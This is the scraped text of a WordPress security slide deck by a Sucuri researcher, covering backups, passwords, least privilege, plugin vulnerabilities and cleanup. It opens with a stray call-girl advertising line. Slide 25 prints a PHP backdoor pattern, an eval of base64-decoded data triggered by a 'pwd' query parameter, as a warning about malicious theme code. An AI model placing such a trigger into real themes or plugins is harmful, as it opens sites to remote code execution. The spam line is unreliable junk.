The document discusses Joseph Herbrandson's work as a researcher and account manager at Sucuri, a company that provides website security services including malware cleanup and attack protection. It outlines Sucuri's services like security scanning, malware cleanup, and blocking attacks. It also discusses common WordPress security issues like outdated plugins, weak passwords, and lack of backups. It describes the "seven deadly sins of WordPress security" including security apathy, lack of backups, and not keeping software updated. Throughout, it provides tips for improving WordPress security such as using a password manager, limiting user privileges, and installing security plugins.
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
The 7 Deadly Sins of WordPress Security
1.
2. ABOUT ME
WEB DESIGN AND INFORMATION SECURITY
Committed to WordPress since 2008.
SUCURI – Researcher and Account Manager
Removing malware and protecting websites.
Personally cleaned over 5,000 websites
SUCURI.NET
Twitter: @JHerbrandson
joseph herbrandson | www.sucuri.net
1-888-873-0817| joseph@sucuri.net
3. ABOUT SUCURI
Over 45 Security Professionals Making a Safer Web
SECURITY SCANNING & ANALYSIS
Checking the health over 3 Million websites
every month through our free
Sitecheck Scanner:
http://sitecheck.sucuri.net
MALWARE CLEANUP
Cleaning and remediating 300 – 400
hacked or infected websites everyday.
ATTACK PROTECTION
Blocking over 33 million attacks and
instances of malicious traffic every month
EDUCATION
Providing detailed and actionable security
information through our blog at
http://blog.sucuri.net
"
joseph herbrandson | www.sucuri.net
1-888-873-0817| joseph@sucuri.net
H
!
G
5. A QUICK DEMO
Attack in Progress:
https://www.youtube.com/watch?v=v4Xr3LrixVg
joseph herbrandson | www.sucuri.net
1-888-873-0817| joseph@sucuri.net
6. Sooo… WHY?
It’s Just Business…probably
- The Short Answer: Fame and Fortune
- $BILLION Spam – Generic Pharmaceuticals, Payday Loans, Gambling,
Designed Brand Knock Offs
- Hacktivism – Politics and religion at the speed of download
- Immaturity – Kids being kids
joseph herbrandson | www.sucuri.net
1-888-873-0817| joseph@sucuri.net
7. the 7 deadly sins of WordPress security
SEVEN
VULNERABILITY
WRATH c
c
joseph herbrandson | www.sucuri.net
1-888-873-0817| joseph@sucuri.net
TWO
PROTECTION
LUST
THREE
THRILL
SEEKING
FOUR
ACCESS
ALOOFNESS
SIX
PRINCIPLE
PRIDE
FIVE
SERVICE
GREED
K
w
t
ONE
SECURITY
APATHY
8. #
sin #1
Security Apathy
I
Ignoring the Requirements
9. THE NEED FOR SECURITY
THE STATE OF THE INTERNET
www.internetlivestats.com
joseph herbrandson | www.sucuri.net
1-888-873-0817| joseph@sucuri.net
10. Shared Hosting Dedicated
Hosting
joseph herbrandson | www.sucuri.net
1-888-873-0817| joseph@sucuri.net
Managed Hosting
HOSTING OPTIONS
Choose wisely
Done
for
you
All
Cheap yours
12. SPEAKING OF ENVIRONMENT…
Who is using the Public Wifi?
joseph herbrandson | www.sucuri.net
1-888-873-0817| joseph@sucuri.net
13. ( II
sin #2
Protection Lust
Searching for the
Security Holygrail
14. WORD of WARNING
No chance of 0% risk.
The next ‘0-Day’ attack is always around the corner…
joseph herbrandson | www.sucuri.net
1-888-873-0817| joseph@sucuri.net
15. SECURITY HEADLINES
Proof: Seen the news lately?
joseph herbrandson | www.sucuri.net
1-888-873-0817| joseph@sucuri.net
16. c III
sin #3
Thrill Seeking
Skydiving is a safer thrill
than going without backups
17. BUT I’VE NEVER HAD A PROBLEM BEFORE…
Have a low profile, non-threatening
site? You are still getting attention
joseph herbrandson | www.sucuri.net
1-888-873-0817| joseph@sucuri.net
s
18. FREE WEBSITE REBRAND
joseph herbrandson | www.sucuri.net
1-888-873-0817| joseph@sucuri.net
HACKERS HARD AT WORK
PHARMACEUTICAL SPAM MAKES
HACKERS TWO BILLION DOLLARS/YEAR
SOLUTION: OFFSITE BACKUPS
RESULT: CLEAN SITE IMMEDIATELY
K
$
å
j
19. AUTOMATED BACKUPS
Know you have a backup plan
backup buddy vaultpress sucuri backups webhosting backups
joseph herbrandson | www.sucuri.net
1-888-873-0817| joseph@sucuri.net
ithemes.com/
backupbuddy/
$
Vaultpress.com Sucuri.net Your hosting
company
20. t IV
sin #4
Access
Aloofness
Sticky Notes:
No longer Best for Password
Management!!
21. top 3 passwords used in 2013
Seriously….
Password Last Year’s Rank
‘123456’ 2
‘PASSWORD’ 1
‘12345678’ 3
credit: SplashData.com
joseph herbrandson | www.sucuri.net
1-888-873-0817| joseph@sucuri.net
22. PASSWORD MANAGER
Remembers your passwords so you don’t have to
lastpass 1password keypass dashlane
lastpass.com agilebits.com keepass.info dashlane.com
joseph herbrandson | www.sucuri.net
1-888-873-0817| joseph@sucuri.net
23. LEAST PRIVILEGE
Does your user setup look like this?
!2
!4
joseph herbrandson | www.sucuri.net
1-888-873-0817| joseph@sucuri.net
!3
Hosting/
!7
Administrator FTP/SFTP
root access
control panel Editor/
contributer
!1
Actual
Admin
Potential
Hackers
Friends
!12
Writers
Seo Guys
Analysts
!2
Editors
!1
Random People
!10
!5
Hackers
Friends
Again…
24. sin #5
w
Service Greed
V
No such thing as
Something for nothing on the
front page of Google
25. NOT THE CODE YOU’RE LOOKING FOR…
Assisting the enemy
This probably shouldn’t be in your theme:
if(isset($_GET['pwd'])) {
eval(base64_decode("CiRhdXRoX3Bhc3MgPSAiN2U5NBhY3RpdmF0ZXM
sIGNoYW5nZWQgZWxlbWVudHMgaW4gdGhlIG9yaWdpbmFsIHBsdWdp
biwgZGVzaWduZWQgdG8gYmVoYXZlIGxpa2UgY2xlYW4gY29kZSwgc2ln
bmFsIHRoZSBoYWNrZXIgdG8gbGV0IGl0IGtub3cgdGhhdCBpdOKAmXMg
aW4uIEEgY2xlYW4gYmFjayBkb29yIGhhcyBiZWVuIG9wZW5lZCwgYW5k
IHlvdXIgc2l0ZSBpcyBub3cgb24gYW4gYXV0b21hdGVkIGF0dGFjayBsaXN
0LCBtZWFudCB0byBxdWlldGx5IGluZmVjdCBhbmQgcmVpbmZlY3QgeW9
1ciBzaXRlIGFnYWluIGFuZCBhZw==“)); }
joseph herbrandson | www.sucuri.net
1-888-873-0817| joseph@sucuri.net
!
26. MORE THAN EXPECTED
joseph herbrandson | www.sucuri.net
1-888-873-0817| joseph@sucuri.net
28. A SYSTEM TO LIVE BY
1. Protect! – Your computer has a firewall, why doesn’t your website?
2. Detect! – The same goes for AntiVirus.
3. Respond! – Clean up the mess. You have a backup right?
Encompassing Actions:
- Know the best practices
- Mind your maintenance
joseph herbrandson | www.sucuri.net
1-888-873-0817| joseph@sucuri.net
29. SYSTEM IN ACTION
joseph herbrandson | www.sucuri.net
1-888-873-0817| joseph@sucuri.net
30. Opening doors you never
knew existed
c
sin #7
Wrath of
Vulnerabilities
VII
31. WORDPRESS CORE
Strong and Secure
j Ñ (
joseph herbrandson | www.sucuri.net
1-888-873-0817| joseph@sucuri.net
Dedicated Creators
Making WordPress
Solid and Secure
Auto-Updates
Get important
patches right away.
Support
Everything you need
at WordPress.org
32. WordPress Version Distribution
3.0 – 4.0 (wordpress.org/about/stats/)
joseph herbrandson | www.sucuri.net
1-888-873-0817| joseph@sucuri.net
33. 3rd Party VULNERABILITIES
Keep watch
Vulnerabilities disclosed at http://blog.sucuri.net
All-In-One SEO – 20 Million Downloads
WPtouch – 6 Million Downloads
MailPoet - 2.7 Million Downloads
Custom Contact Forms – 640k Downloads
Slider Revolution – Hundreds of Thousands (themeforest/codecanyon)
joseph herbrandson | www.sucuri.net
1-888-873-0817| joseph@sucuri.net
34. Z X
Going
further
Transition from
Mark to Master
Tips, Tools, and Services
35. WEBSITE ANTIVIRUS & FIREWALL
Protection and Detection
Don’t be the mark! Understand the changes you are implementing
“AntiVirus” “Firewall”
joseph herbrandson | www.sucuri.net
1-888-873-0817| joseph@sucuri.net
WordFence
Sucuri Website Antivirus
CloudFlare
Sucuri Website Firewall
“Utilities”
iThemes Security
BruteProtect
Sucuri Security Plugin
36. RESOURCES
Because you don’t know what you don’t know
General WordPress Security:
https://codex.wordpress.org/Hardening_WordPress
https://blog.sucuri.net
Hacking and General Security:
http://www.securityfocus.com/
http://blogs.sophos.com/
Facebook Groups:
WordPress Security
Advanced WordPress
SubReddits:
Reddit.com/r/Hacking
Reddit.com/r/WordPress
joseph herbrandson | www.sucuri.net
1-888-873-0817| joseph@sucuri.net
37. EASY PATH TO CLEANUP
Response
NEED:
Releases of WordPress at:
https://wordpress.org/download/release-archive/
Clean backup of active theme and required plugins
New Passwords (WordPress, FTP, Hosting Control Panel, Everything Else)
joseph herbrandson | www.sucuri.net
1-888-873-0817| joseph@sucuri.net